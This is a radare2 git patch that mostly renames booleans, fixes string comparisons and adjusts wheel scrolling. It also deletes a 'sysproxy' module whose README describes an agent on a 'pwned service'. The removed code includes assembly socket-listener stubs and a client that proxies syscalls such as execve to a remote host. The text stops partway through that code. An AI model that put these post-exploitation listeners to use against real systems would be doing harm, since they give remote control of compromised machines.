From 4e47d86de02682db5387d3667a00cb79154ad341 Mon Sep 17 00:00:00 2001 From: pancake Date: Mon, 14 Sep 2015 16:22:57 +0200 Subject: [PATCH] Honor wheelspeed, fix oob in vmenus and more boolification --- libr/config/callback.c | 18 +- libr/config/config.c | 30 +- libr/core/cmd_search.c | 8 +- libr/core/config.c | 2 +- libr/core/disasm.c | 5 +- libr/core/graph.c | 63 ++-- libr/core/vmenus.c | 108 +++--- libr/io/desc.c | 4 +- libr/io/vio.c | 2 +- libr/sysproxy/README | 33 -- libr/sysproxy/listeners/getsock.S | 22 -- libr/sysproxy/listeners/lis_socket_tcp.S | 55 ---- libr/sysproxy/listeners/lis_socket_udp.S | 34 -- libr/sysproxy/rpc.c | 134 -------- libr/sysproxy/sp.h | 22 -- libr/sysproxy/syscall-linux.c | 398 ----------------------- libr/sysproxy/syscall.S | 67 ---- libr/sysproxy/syscall.c | 5 - libr/sysproxy/test_sp.c | 45 --- libr/sysproxy/test_srv.c | 67 ---- libr/sysproxy/test_srv1.c | 11 - 21 files changed, 117 insertions(+), 1016 deletions(-) delete mode 100644 libr/sysproxy/README delete mode 100644 libr/sysproxy/listeners/getsock.S delete mode 100644 libr/sysproxy/listeners/lis_socket_tcp.S delete mode 100644 libr/sysproxy/listeners/lis_socket_udp.S delete mode 100644 libr/sysproxy/rpc.c delete mode 100644 libr/sysproxy/sp.h delete mode 100644 libr/sysproxy/syscall-linux.c delete mode 100644 libr/sysproxy/syscall.S delete mode 100644 libr/sysproxy/syscall.c delete mode 100644 libr/sysproxy/test_sp.c delete mode 100644 libr/sysproxy/test_srv.c delete mode 100644 libr/sysproxy/test_srv1.c diff --git a/libr/config/callback.c b/libr/config/callback.c index fe1314b446..d3ef19f90a 100644 --- a/libr/config/callback.c +++ b/libr/config/callback.c @@ -6,13 +6,13 @@ static int r_config_setter_q(void *data) { RConfigNode *node = data; *(node->cb_ptr_q) = node->i_value; - return R_TRUE; + return true; } static int r_config_setter_i(void *data) { RConfigNode *node = data; *(node->cb_ptr_i) = node->i_value; - return R_TRUE; + return true; } static int r_config_setter_s(void *data) { @@ -21,7 +21,7 @@ static int r_config_setter_s(void *data) { free (*node->cb_ptr_s); *node->cb_ptr_s = NULL; } else *node->cb_ptr_s = r_str_dup (*node->cb_ptr_s, node->value); - return R_TRUE; + return true; } R_API int r_config_set_setter_q(RConfig *cfg, const char *name, ut64 *ptr) { @@ -29,9 +29,9 @@ R_API int r_config_set_setter_q(RConfig *cfg, const char *name, ut64 *ptr) { if (node) { node->cb_ptr_q = ptr; node->setter = (void *)&r_config_setter_q; - return R_TRUE; + return true; } - return R_FALSE; + return false; } R_API int r_config_set_setter_i(RConfig *cfg, const char *name, int *ptr) { @@ -39,9 +39,9 @@ R_API int r_config_set_setter_i(RConfig *cfg, const char *name, int *ptr) { if (node) { node->cb_ptr_i = ptr; node->setter = (void *)&r_config_setter_i; - return R_TRUE; + return true; } - return R_FALSE; + return false; } R_API int r_config_set_setter_s(RConfig *cfg, const char *name, char **ptr) { @@ -49,7 +49,7 @@ R_API int r_config_set_setter_s(RConfig *cfg, const char *name, char **ptr) { if (node) { node->cb_ptr_s = ptr; node->setter = (void *)&r_config_setter_s; - return R_TRUE; + return true; } - return R_FALSE; + return false; } diff --git a/libr/config/config.c b/libr/config/config.c index 4c68604a25..990a0768bb 100644 --- a/libr/config/config.c +++ b/libr/config/config.c @@ -136,9 +136,9 @@ R_API int r_config_swap(RConfig *cfg, const char *name) { RConfigNode *node = r_config_node_get (cfg, name); if (node && node->flags & CN_BOOL) { r_config_set_i (cfg, name, !node->i_value); - return R_TRUE; + return true; } - return R_FALSE; + return false; } R_API ut64 r_config_get_i(RConfig *cfg, const char *name) { @@ -227,7 +227,7 @@ R_API RConfigNode *r_config_set(RConfig *cfg, const char *name, const char *valu if (node && node->setter) { int ret = node->setter (cfg->user, node); - if (ret == R_FALSE) { + if (ret == false) { if (oi != UT64_MAX) node->i_value = oi; free (node->value); @@ -265,9 +265,9 @@ R_API int r_config_rm(RConfig *cfg, const char *name) { r_hashtable_remove (cfg->ht, node->hash); r_list_delete_data (cfg->nodes, node); cfg->n_nodes--; - return R_TRUE; + return true; } - return R_FALSE; + return false; } R_API RConfigNode *r_config_set_i(RConfig *cfg, const char *name, const ut64 i) { @@ -311,7 +311,7 @@ R_API RConfigNode *r_config_set_i(RConfig *cfg, const char *name, const ut64 i) if (node && node->setter) { ut64 oi = node->i_value; int ret = node->setter (cfg->user, node); - if (ret == R_FALSE) { + if (ret == false) { node->i_value = oi; free (node->value); node->value = strdup (ov? ov: ""); @@ -324,24 +324,24 @@ R_API RConfigNode *r_config_set_i(RConfig *cfg, const char *name, const ut64 i) R_API int r_config_eval(RConfig *cfg, const char *str) { char *ptr, *a, *b, name[1024]; unsigned int len; - if (!str || !cfg) return R_FALSE; + if (!str || !cfg) return false; len = strlen (str)+1; if (len >= sizeof (name)) - return R_FALSE; + return false; memcpy (name, str, len); str = r_str_chop (name); if (str == NULL) - return R_FALSE; + return false; if (str[0]=='\0' || !strcmp (str, "help")) { r_config_list (cfg, NULL, 0); - return R_FALSE; + return false; } if (str[0]=='-') { r_config_rm (cfg, str+1); - return R_FALSE; + return false; } ptr = strchr (str, '='); @@ -355,7 +355,7 @@ R_API int r_config_eval(RConfig *cfg, const char *str) { char *foo = r_str_chop (name); if (foo[strlen(foo)-1]=='.') { r_config_list (cfg, name, 0); - return R_FALSE; + return false; } else { /* get */ const char *str = r_config_get(cfg, foo); @@ -364,7 +364,7 @@ R_API int r_config_eval(RConfig *cfg, const char *str) { (((int)(size_t)str)==1)?"true":str); } } - return R_TRUE; + return true; } static int cmp(RConfigNode *a, RConfigNode *b) { @@ -378,9 +378,9 @@ R_API void r_config_lock(RConfig *cfg, int l) { R_API int r_config_readonly (RConfig *cfg, const char *key) { RConfigNode *n = r_config_node_get (cfg, key); - if (!n) return R_FALSE; + if (!n) return false; n->flags |= CN_RO; - return R_TRUE; + return true; } R_API RConfig *r_config_new(void *user) { diff --git a/libr/core/cmd_search.c b/libr/core/cmd_search.c index 41330f6076..cbba034503 100644 --- a/libr/core/cmd_search.c +++ b/libr/core/cmd_search.c @@ -1721,7 +1721,7 @@ reread: do_anal_search (core, ¶m, "?"); break; } - dosearch = 0; + dosearch = false; break; case 'a': if (input[1]) { char *kwd = r_core_asm_search (core, input+param_offset, @@ -1741,7 +1741,8 @@ reread: } } break; case 'C': { - dosearch = param.crypto_search = true; + dosearch = true; + param.crypto_search = true; switch (input[1]) { case 'a': param.aes_search = true; @@ -1750,7 +1751,8 @@ reread: param.rsa_search = true; break; default:{ - dosearch = param.crypto_search = false; + dosearch = false; + param.crypto_search = false; const char* help_msg[] = { "Usage: /C", "", "Search for crypto materials", "/Ca", "" , "Search for AES keys", diff --git a/libr/core/config.c b/libr/core/config.c index 565763fc4b..31d7b0d525 100644 --- a/libr/core/config.c +++ b/libr/core/config.c @@ -1407,7 +1407,7 @@ R_API int r_core_config_init(RCore *core) { #endif SETPREF("scr.wheel", "true", "Mouse wheel in Visual; temporaryly disable/reenable by right click/Enter)"); SETPREF("scr.atport", "false", "V@ starts a background http server and spawns an r2 -C"); - SETI("scr.wheelspeed", 1, "Mouse wheel speed"); + SETI("scr.wheelspeed", 4, "Mouse wheel speed"); // DEPRECATED: USES hex.cols now SETI("scr.colpos", 80, "Column position of cmd.cprompt in visual"); SETICB("scr.columns", 0, &cb_scrcolumns, "Force console column count (width)"); SETCB("scr.rows", "0", &cb_scrrows, "Force console row count (height) "); diff --git a/libr/core/disasm.c b/libr/core/disasm.c index 1a9a389aa9..38b822db9f 100644 --- a/libr/core/disasm.c +++ b/libr/core/disasm.c @@ -2186,7 +2186,6 @@ static int likely = 0; static int show_slow = 0; static int myregwrite(RAnalEsil *esil, const char *name, ut64 val) { - int ret; char str[64], *msg = NULL; ut32 *n32 = (ut32*)str; likely = 1; @@ -2201,8 +2200,8 @@ static int myregwrite(RAnalEsil *esil, const char *name, ut64 val) { if (fi) { strncpy (str, fi->name, sizeof (str)-1); } - if (str[0] == 0) { - ret = r_io_read_at (esil->anal->iob.io, val, (ut8*)str, sizeof (str)-1); + if (!str[0]) { + (void)r_io_read_at (esil->anal->iob.io, val, (ut8*)str, sizeof (str)-1); str[sizeof (str)-1] = 0; if (*str && r_str_is_printable (str)) { // do nothing diff --git a/libr/core/graph.c b/libr/core/graph.c index df37369d11..666eb81f6a 100644 --- a/libr/core/graph.c +++ b/libr/core/graph.c @@ -2306,7 +2306,7 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti const char *key_s; RConsCanvas *can; RAGraph *g; - int wheelspeed; + int movspeed; int w, h; int ret; int invscroll; @@ -2330,6 +2330,7 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti is_error = true; goto err_graph_new; } + // deprecate ? g->movspeed = r_config_get_i (core->config, "graph.scroll"); grd = R_NEW (struct agraph_refresh_data); @@ -2374,18 +2375,22 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti // r_core_graph_inputhandle() okey = r_cons_readchar (); key = r_cons_arrow_to_hjkl (okey); - wheelspeed = r_config_get_i (core->config, "scr.wheelspeed"); - switch (key) { - case 'j': - case 'k': - switch (mousemode) { - case 0: break; - case 1: key = key=='k'?'h':'l'; break; - case 2: key = key=='k'?'J':'K'; break; - case 3: key = key=='k'?'L':'H'; break; + if (core->cons->mouse_event) { + movspeed = r_config_get_i (core->config, "scr.wheelspeed"); + switch (key) { + case 'j': + case 'k': + switch (mousemode) { + case 0: break; + case 1: key = key=='k'?'h':'l'; break; + case 2: key = key=='k'?'J':'K'; break; + case 3: key = key=='k'?'L':'H'; break; + } + break; } - break; + } else { + movspeed = r_config_get_i (core->config, "graph.scroll"); } switch (key) { @@ -2492,9 +2497,8 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti case 'U': { ut64 off = r_io_sundo_redo (core->io); - if (off != UT64_MAX) - r_core_seek (core,off, 1); - else eprintf ("Can not redo\n"); + if (off != UT64_MAX) r_core_seek (core,off, 1); + else eprintf ("Cannot redo\n"); break; } case 'R': @@ -2508,16 +2512,11 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti /* TODO: reload only the body of the nodes to update colors */ break; case '!': - { - /* TODO: remove this option once the colored are "stable" */ - int colors = r_config_get_i (core->config, "scr.color"); - r_config_set_i (core->config, "scr.color", !colors); + r_config_set_i (core->config, "scr.color", + !r_config_get_i (core->config, "scr.color")); g->need_reload_nodes = true; break; - } - case 'r': - agraph_set_layout (g, true); - break; + case 'r': agraph_set_layout (g, true); break; case 'm': mousemode++; if (!mousemodes[mousemode]) @@ -2528,17 +2527,15 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti if (mousemode<0) mousemode = 3; break; - case 'J': get_anode(g->curnode)->y += g->movspeed; break; - case 'K': get_anode(g->curnode)->y -= g->movspeed; break; - case 'H': get_anode(g->curnode)->x -= g->movspeed; break; - case 'L': get_anode(g->curnode)->x += g->movspeed; break; - case 'j': can->sy -= g->movspeed * (invscroll ? -1 : 1); break; - case 'k': can->sy += g->movspeed * (invscroll ? -1 : 1); break; - case 'l': can->sx -= g->movspeed * (invscroll ? -1 : 1); break; - case 'h': can->sx += g->movspeed * (invscroll ? -1 : 1); break; - case 'e': - can->linemode = !!!can->linemode; - break; + case 'J': get_anode(g->curnode)->y += movspeed; break; + case 'K': get_anode(g->curnode)->y -= movspeed; break; + case 'H': get_anode(g->curnode)->x -= movspeed; break; + case 'L': get_anode(g->curnode)->x += movspeed; break; + case 'j': can->sy -= movspeed * (invscroll ? -1 : 1); break; + case 'k': can->sy += movspeed * (invscroll ? -1 : 1); break; + case 'l': can->sx -= movspeed * (invscroll ? -1 : 1); break; + case 'h': can->sx += movspeed * (invscroll ? -1 : 1); break; + case 'e': can->linemode = !!!can->linemode; break; case 'p': agraph_toggle_small_nodes (g); agraph_update_seek (g, get_anode (g->curnode), true); diff --git a/libr/core/vmenus.c b/libr/core/vmenus.c index 7845fae108..99d668d74f 100644 --- a/libr/core/vmenus.c +++ b/libr/core/vmenus.c @@ -4,6 +4,16 @@ #define MAX_FORMAT 3 +typedef struct { + RCore *core; + int t_idx; + int t_ctr; + const char *type; + char *curname; + char *curfmt; + const char *optword; +} RCoreVisualTypes; + // TODO: move this helper into r_cons static char *prompt(const char *str, const char *txt) { char cmd[1024]; @@ -31,16 +41,6 @@ static char *prompt(const char *str, const char *txt) { return res; } -typedef struct { - RCore *core; - int t_idx; - int t_ctr; - const char *type; - char *curname; - char *curfmt; - const char *optword; -} RCoreVisualTypes; - static inline char *getformat (RCoreVisualTypes *vt, const char *k) { return sdb_get (vt->core->anal->sdb_types, sdb_fmt (0, "type.%s", k), 0); @@ -543,55 +543,51 @@ R_API int r_core_visual_trackflags(RCore *core) { } R_API int r_core_visual_comments (RCore *core) { - char cmd[512], *p = NULL; - int delta = 7; - int i, ch, option = 0; - int format = 0; - int found = 0; - ut64 from = 0, size = 0; +#undef DB +#define DB core->anal->sdb_meta + const char *val, *comma = NULL; + char *list = sdb_get (DB, "meta.C", 0); + char *str, *next, *cur = list; + char key[128], cmd[512], *p = NULL; + int i, ch, option = 0, delta = 7; + int format = 0, found = 0; + ut64 addr, from = 0, size = 0; for (;;) { r_cons_clear00 (); r_cons_strcat ("Comments:\n"); i = 0; found = 0; -#undef DB -#define DB core->anal->sdb_meta - ut64 addr; - char key[128]; - const char *val, *comma = NULL; - char *list = sdb_get (DB, "meta.C", 0); - char *str, *next, *cur = list; - if (list) { - for (i=0; ;i++) { - cur = sdb_anext (cur, &next); - addr = sdb_atoi (cur); - snprintf (key, sizeof (key)-1, "meta.C.0x%08"PFMT64x, addr); - val = sdb_const_get (DB, key, 0); - if (val) - comma = strchr (val, ','); - if (comma) { - str = (char *)sdb_decode (comma+1, 0); - if ((i>=option-delta) && ((isize; - free (p); - p = str; - r_cons_printf (" > %s\n", str); - } else { - r_cons_printf (" %s\n", str); - free (str); - } - } else free (str); + if (list) { + for (i=0; ;i++) { + cur = sdb_anext (cur, &next); + addr = sdb_atoi (cur); + snprintf (key, sizeof (key)-1, "meta.C.0x%08"PFMT64x, addr); + val = sdb_const_get (DB, key, 0); + if (val) + comma = strchr (val, ','); + if (comma) { + str = (char *)sdb_decode (comma+1, 0); + if ((i>=option-delta) && ((isize; + free (p); + p = str; + r_cons_printf (" > %s\n", str); + } else { + r_cons_printf (" %s\n", str); + free (str); } - if (!next) - break; - cur = next; - } + } else free (str); } + if (!next) + break; + cur = next; + } + } if (!found) { option--; @@ -1026,7 +1022,7 @@ R_API void r_core_visual_mounts (RCore *core) { if (file->type == 'd') { strncat (path, file->name, sizeof (path)-strlen (path)-1); r_str_chop_path (path); - if (!root || memcmp (root, path, strlen (root)-1)) + if (!root || strncmp (root, path, strlen (root)-1)) strncpy (path, root, sizeof (path)-1); } else { r_core_cmdf (core, "s 0x%"PFMT64x, file->off); @@ -1116,7 +1112,7 @@ R_API void r_core_visual_mounts (RCore *core) { if (file && root) { strncat (path, file->name, sizeof (path)-strlen (path)-1); r_str_chop_path (path); - if (memcmp (root, path, strlen (root)-1)) + if (strncmp (root, path, strlen (root)-1)) strncpy (path, root, sizeof (path)-1); file = r_fs_open (core->fs, path); if (file) { @@ -1475,7 +1471,7 @@ R_API void r_core_seek_next(RCore *core, const char *type) { const char *pfx = r_config_get (core->config, "search.prefix"); RFlagItem *flag; r_list_foreach (core->flags->flags, iter, flag) { - if (!memcmp (flag->name, pfx, strlen (pfx))) + if (!strncmp (flag->name, pfx, strlen (pfx))) if (flag->offset < next && flag->offset > core->offset) next = flag->offset; } @@ -1486,7 +1482,7 @@ R_API void r_core_seek_next(RCore *core, const char *type) { next = flag->offset; } } - if (next!=UT64_MAX) + if (next != UT64_MAX) r_core_seek (core, next, 1); } @@ -1507,7 +1503,7 @@ R_API void r_core_seek_previous (RCore *core, const char *type) { RFlagItem *flag; const char *pfx = r_config_get (core->config, "search.prefix"); r_list_foreach (core->flags->flags, iter, flag) { - if (!memcmp (flag->name, pfx, strlen (pfx))) + if (!strncmp (flag->name, pfx, strlen (pfx))) if (flag->offset > next && flag->offset< core->offset) next = flag->offset; } diff --git a/libr/io/desc.c b/libr/io/desc.c index 47458c1f4e..ceaab7a4ca 100644 --- a/libr/io/desc.c +++ b/libr/io/desc.c @@ -90,10 +90,10 @@ R_API int r_io_desc_del(RIO *io, int fd) { r_io_desc_free (d); iter->data = NULL; // enforce free r_list_delete (io->files, iter); - return R_TRUE; + return true; } } - return R_FALSE; + return false; } R_API RIODesc *r_io_desc_get(RIO *io, int fd) { diff --git a/libr/io/vio.c b/libr/io/vio.c index 60e8892c91..ded44533f9 100644 --- a/libr/io/vio.c +++ b/libr/io/vio.c @@ -115,7 +115,7 @@ R_API int r_io_vread (RIO *io, ut64 vaddr, ut8 *buf, int len) { r_list_free (maps); //free the list r_io_mread (io, io->desc->fd, vaddr, buf, len); //ensure that io->desc is always on the top } - return R_TRUE; + return true; } /*you can throw any fd on this beast, it's important that len is equal or smaller than the size of buf*/ diff --git a/libr/sysproxy/README b/libr/sysproxy/README deleted file mode 100644 index 845f0d26d1..0000000000 --- a/libr/sysproxy/README +++ /dev/null @@ -1,33 +0,0 @@ -r_sysproxy -========== - -This module implements a multiarch/os proxy syscalling library. - -ATM the contents of this directory are a mess.. See radare1 for a working -implementation... Here we will specify a standard API and we will have to -write sysproxy agents for other architectures and operating systems. - -+-------------------+ +-----------------+ -| sysproxy listener | <--. .-- | sysproxy client | -+-------------------+ | network | +-----------------+ - arch/os/dependant `-----------' radare sysproxy:// - - - listener agent - - pwned service - - ... - ------------------------------------------------------- -sp = r_sysproxy_new () -if (fork()) { - r_sysproxy_listen (sp, 9999); -} else { - r_sysproxy_connect (sp, "127.0.0.1", 9999); - ret = r_sysproxy_call (sp, R_SYSPROXY_SC_WRITE, buf, 128); -} ------------------------------------------------------- - -The sysproxy r_io plugin implements a basic IO abstraction using -sysproxy to remotely open/read/write files, but maybe also for remote -debugging using ptrace() thru r_sysproxy. - ---pancake diff --git a/libr/sysproxy/listeners/getsock.S b/libr/sysproxy/listeners/getsock.S deleted file mode 100644 index 7bf2e347b5..0000000000 --- a/libr/sysproxy/listeners/getsock.S +++ /dev/null @@ -1,22 +0,0 @@ -.global getsock -.code32 - -getsock: - xorl %edx, %edx - pushl %esp - pushl %esp - pushl %edx - movl %esp, %ecx - movl $6, %ebx - -search_sock: - movl $0x66, %eax - inc %edx - movl %edx, (%ecx) -#getsockname - int $0x80 - test %eax, %eax - jnz search_sock - -sock_found: - movl %edx, %ebx diff --git a/libr/sysproxy/listeners/lis_socket_tcp.S b/libr/sysproxy/listeners/lis_socket_tcp.S deleted file mode 100644 index df5733f183..0000000000 --- a/libr/sysproxy/listeners/lis_socket_tcp.S +++ /dev/null @@ -1,55 +0,0 @@ -.global lis_sock_tcp -.code32 - -# th0rpe - 08-27-2007 - -lis_sock_tcp: -# open port 8181 = 1FF5 - -#s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) - pushl $0x6 - pushl $0x1 - pushl $0x2 - xorl %ebx, %ebx - incl %ebx - movl %esp, %ecx - movl $0x66, %eax - int $0x80 - -#save socket - movl %eax, %edx - -#bind(s, &b, 0x10) - pushl $0x0 - pushl $0xF51F0002 - movl %esp, %eax - pushl $0x10 - pushl %eax - pushl %edx - movl %esp, %ecx - incl %ebx - movl $0x66, %eax - int $0x80 - -#listen(s, 5) - pushl $0x5 - pushl %edx - movl %esp, %ecx - incl %ebx - incl %ebx - movl $0x66, %eax - int $0x80 - -#accept(s, &b, &(0x10)) - pushl $0x10 - pushl %esp - leal 8(%esp), %eax - pushl %eax - pushl %edx - movl %esp, %ecx - incl %ebx - movl $0x66, %eax - int $0x80 - -#save socket connection - movl %eax, %ebx diff --git a/libr/sysproxy/listeners/lis_socket_udp.S b/libr/sysproxy/listeners/lis_socket_udp.S deleted file mode 100644 index e11e469184..0000000000 --- a/libr/sysproxy/listeners/lis_socket_udp.S +++ /dev/null @@ -1,34 +0,0 @@ -.global lis_sock_udp -.code32 - -# th0rpe - 08-27-2007 - -lis_sock_udp: - -#s = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) - pushl $17 - pushl $0x2 - pushl $0x2 - xorl %ebx, %ebx - incl %ebx - movl %esp, %ecx - movl $0x66, %eax - int $0x80 - -#save socket - movl %eax, %edx - -#bind(s, &b, 0x10) - pushl $0x0 - pushl $0xF51F0002 - movl %esp, %eax - pushl $0x10 - pushl %eax - pushl %edx - movl %esp, %ecx - incl %ebx - movl $0x66, %eax - int $0x80 - -#save socket connection - movl %edx, %ebx diff --git a/libr/sysproxy/rpc.c b/libr/sysproxy/rpc.c deleted file mode 100644 index bc52ee5122..0000000000 --- a/libr/sysproxy/rpc.c +++ /dev/null @@ -1,134 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include "sp.h" - -#include -#include -#include - -static int rpc_con; -static char rpc_data[MAX_PACKET]; -static char *remote_buf; - -void dump(char *buf, int len) -{ - int i; - - printf("dump buf 0x%x with len %i\n", (unsigned int)buf, len); - - for(i = 0; i < len; i++) { - if(i % 16 == 0) - printf("\n %.2x", (unsigned char)buf[i]); - else - printf(" %.2x", (unsigned char )buf[i]); - } - printf("\n"); -} - -int dump_raw(char *buf, int len) -{ - int i; - for(i = 0;i < len; i++) - printf("%c", buf[i]); - exit(1); -} - -inline char *rpc_data_at(int off) -{ - return rpc_data + sizeof(struct regs) + off; -} - -int rpc_syscall(struct regs *rg, - struct arg **args, int n_args) -{ - char *p; - int i; - int ret; - - /* copy arguments */ - p = (char *)(rpc_data + sizeof(*rg)); - - for(i = 0; i < n_args; p += args[i]->len, i++) { - if(p + args[i]->len > rpc_data + MAX_PACKET) { - errno = ENOMEM; - return -1; - } - - memcpy(p, args[i]->buf, args[i]->len); - } - - /* copy registers */ - memcpy(rpc_data, rg, sizeof(*rg)); - -#ifdef DEBUG - dump(rpc_data, (unsigned long)p - (unsigned long)rpc_data); -#endif - //dump_raw(rpc_data,(unsigned long)p - (unsigned long)rpc_data); - - /* send rpc */ - ret = write(rpc_con, rpc_data, - (unsigned long)p - (unsigned long)rpc_data); - - - /* error? */ - if(ret < 0) - return ret; - - /* wait for response ... */ - ret = read(rpc_con, rpc_data, MAX_PACKET); - if(ret < 0) - return ret; - - rg = (struct regs *)rpc_data; - - return rg->eax; -} - -inline unsigned long rpc_reloc(int off) -{ - return (unsigned long)(remote_buf + off); -} - -void rpc_init(char *host, int port) -{ - struct sockaddr_in in; - int ret; - - memset(&in, 0, sizeof(in)); - in.sin_addr.s_addr = inet_addr(host); - in.sin_port = htons(port); - in.sin_family = AF_INET; - - rpc_con = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - if(rpc_con < 0) { - perror("socket"); - exit(1); - } - - if(connect(rpc_con, (struct sockaddr *)&in, sizeof(in)) < 0) { - perror("rpc_connect"); - exit(1); - } - - ret = read(rpc_con, &remote_buf, sizeof(char *)); - - if(ret < 0) { - perror("read"); - exit(1); - } else { - printf("ret: %i\n", ret); - if(ret != sizeof(char *)) { - fprintf(stderr, "ERROR: Invalid buffer address!\n"); - //exit(1); - } - } - - printf("Remote buf: 0x%x\n", (unsigned int)remote_buf); -} diff --git a/libr/sysproxy/sp.h b/libr/sysproxy/sp.h deleted file mode 100644 index 73ed1f7a38..0000000000 --- a/libr/sysproxy/sp.h +++ /dev/null @@ -1,22 +0,0 @@ -#ifndef SP_H -#define SP_H - -#define MAX_PACKET 2048 - -struct regs { - unsigned int edi; - unsigned int esi; - unsigned int ebp; - unsigned int xx; - unsigned int ebx; - unsigned int edx; - unsigned int ecx; - unsigned int eax; -}; - -struct arg { - char *buf; - int len; -}; - -#endif diff --git a/libr/sysproxy/syscall-linux.c b/libr/sysproxy/syscall-linux.c deleted file mode 100644 index 92d1ac0d69..0000000000 --- a/libr/sysproxy/syscall-linux.c +++ /dev/null @@ -1,398 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include "sp.h" - -extern unsigned long rpc_reloc(int off); -extern char *rpc_data_at(int off); -extern int rpc_syscall(struct regs *rg, - struct arg **args, int n_args); - -int sys_write(int fd, char *buf, int len) -{ - struct regs r; - struct arg *args[1]; - struct arg arg; - - memset(&r, 0, sizeof(r)); - r.eax = 4; - r.ebx = fd; - r.edx = len; - /* reference first argument */ - r.ecx = rpc_reloc(sizeof(r)); - - /* buffer argument */ - arg.len = len; - arg.buf = buf; - args[0] = &arg; - - return rpc_syscall(&r, args, 1); -} - -int sys_open(char *f, int flags, int mode) -{ - struct regs r; - struct arg *args[1]; - struct arg arg; - - memset(&r, 0, sizeof(r)); - r.eax = 5; - r.ebx = rpc_reloc(sizeof(r)); - r.edx = mode; - r.ecx = flags; - - /* buffer argument */ - arg.len = strlen(f) + 1; - arg.buf = f; - args[0] = &arg; - - return rpc_syscall(&r, args, 1); -} - -int sys_read(int fd, char *b, int len) -{ - struct regs r; - struct arg *args[1]; - struct arg arg; - int ret; - - memset(&r, 0, sizeof(r)); - r.eax = 3; - r.ebx = fd; - r.ecx = rpc_reloc(sizeof(r)); - r.edx = len; - - /* buffer argument */ - arg.len = 0; - arg.buf = b; - args[0] = &arg; - - ret = rpc_syscall(&r, args, 1); - if(ret > 0) - memcpy(b, (char *)rpc_data_at(0), ret); - - return ret; -} - -int sys_lseek(int af, int f, int proto) -{ - struct regs r; - struct arg *args[1]; - struct arg arg; - int sock_args[3]; - - memset(&r, 0, sizeof(r)); - r.eax = 19; - r.ebx = 1; - r.ecx = rpc_reloc(sizeof(r)); - - sock_args[0] = af; - sock_args[1] = f; - sock_args[2] = proto; - - /* buffer argument */ - arg.len = 0; - arg.buf = NULL; - args[0] = &arg; - - return rpc_syscall(&r, args, 1); -} - -int sys_socket(int af, int f, int proto) -{ - struct regs r; - struct arg *args[1]; - struct arg arg; - int sock_args[3]; - - memset(&r, 0, sizeof(r)); - r.eax = 0x66; - r.ebx = 1; - r.ecx = rpc_reloc(sizeof(r)); - - sock_args[0] = af; - sock_args[1] = f; - sock_args[2] = proto; - - /* buffer argument */ - arg.len = sizeof(sock_args); - arg.buf = (char *)sock_args; - args[0] = &arg; - - return rpc_syscall(&r, args, 1); -} - -int sys_bind(int s, char *b, int len) -{ - struct regs r; - struct arg *args[2]; - struct arg arg[2]; - int sock_args[3]; - - memset(&r, 0, sizeof(r)); - r.eax = 0x66; - r.ebx = 2; - r.ecx = rpc_reloc(sizeof(r)); - - sock_args[0] = s; - sock_args[1] = rpc_reloc(sizeof(r) + sizeof(sock_args)); - sock_args[2] = len; - - /* buffer argument */ - arg[0].len = sizeof(sock_args); - arg[0].buf = (char *)sock_args; - args[0] = &arg[0]; - - /* buffer argument */ - arg[1].len = len; - arg[1].buf = b; - args[1] = &arg[1]; - - return rpc_syscall(&r, args, 2); -} - -int sys_setsockopt(int s, int l, int optn, char *optval, int optlen) -{ - struct regs r; - struct arg *args[1]; - struct arg arg[1]; - int sock_args[5]; - - memset(&r, 0, sizeof(r)); - r.eax = 0x66; - r.ebx = 0xe; - r.ecx = rpc_reloc(sizeof(r)); - - sock_args[0] = s; - sock_args[1] = l; - sock_args[2] = optn; - sock_args[3] = (int)rpc_reloc(sizeof(r) + sizeof(sock_args)); - sock_args[4] = optlen; - - arg[0].len = sizeof(sock_args); - arg[0].buf = (char *)sock_args; - args[0] = &arg[0]; - - arg[1].len = optlen; - arg[1].buf = optval; - args[1] = &arg[1]; - - return rpc_syscall(&r, args, 2); -} - -int sys_listen(int s, int b) -{ - struct regs r; - struct arg *args[1]; - struct arg arg; - int sock_args[2]; - - memset(&r, 0, sizeof(r)); - r.eax = 0x66; - r.ebx = 4; - r.ecx = rpc_reloc(sizeof(r)); - - sock_args[0] = s; - sock_args[1] = b; - - /* buffer argument */ - arg.len = sizeof(sock_args); - arg.buf = (char *)sock_args; - args[0] = &arg; - - return rpc_syscall(&r, args, 1); -} - -int sys_accept(int s, char *b, int *len) -{ - struct regs r; - struct arg *args[3]; - struct arg arg[3]; - int sock_args[3]; - - memset(&r, 0, sizeof(r)); - r.eax = 0x66; - r.ebx = 5; - r.ecx = rpc_reloc(sizeof(r)); - - sock_args[0] = s; - sock_args[1] = rpc_reloc(sizeof(r) + sizeof(sock_args)); - sock_args[2] = rpc_reloc(sizeof(r) + sizeof(sock_args) + *len); - - /* buffer argument */ - arg[0].len = sizeof(sock_args); - arg[0].buf = (char *)sock_args; - args[0] = &arg[0]; - - /* buffer argument */ - arg[1].len = *len; - arg[1].buf = b; - args[1] = &arg[1]; - - /* buffer argument */ - arg[2].len = sizeof(*len); - arg[2].buf = (char *)len; - args[2] = &arg[2]; - - return rpc_syscall(&r, args, 3); - -} - -int sys_execve(char *f, char **argv, char **env) -{ - struct regs r; - struct arg **args; - struct arg *arg; - int n_args = 1; - int file_len = strlen(f) + 1; - char **args_p = NULL; - char **env_p = NULL; - int args_len = 0, env_len = 0; - int off; - int i, ret; - - memset(&r, 0, sizeof(r)); - r.eax = 0xb; - - /* filename */ - r.ebx = rpc_reloc(sizeof(r)); - - /* arguments */ - r.ecx = rpc_reloc(sizeof(r) + file_len); - - /* get length of arguments array */ - if(argv) { - for(; argv[args_len] != NULL; args_len++) - ; - /* arguments */ - r.ecx = rpc_reloc(sizeof(r) + file_len); - args_len++; - } else { - /* arguments */ - r.ecx = 0; - } - - /* get length of environments array */ - if(env) { - for(; env[env_len] != NULL; env_len++) - ; - /* environment */ - r.edx = rpc_reloc(sizeof(r) + file_len + sizeof(char *) \ - * args_len); - env_len++; - } 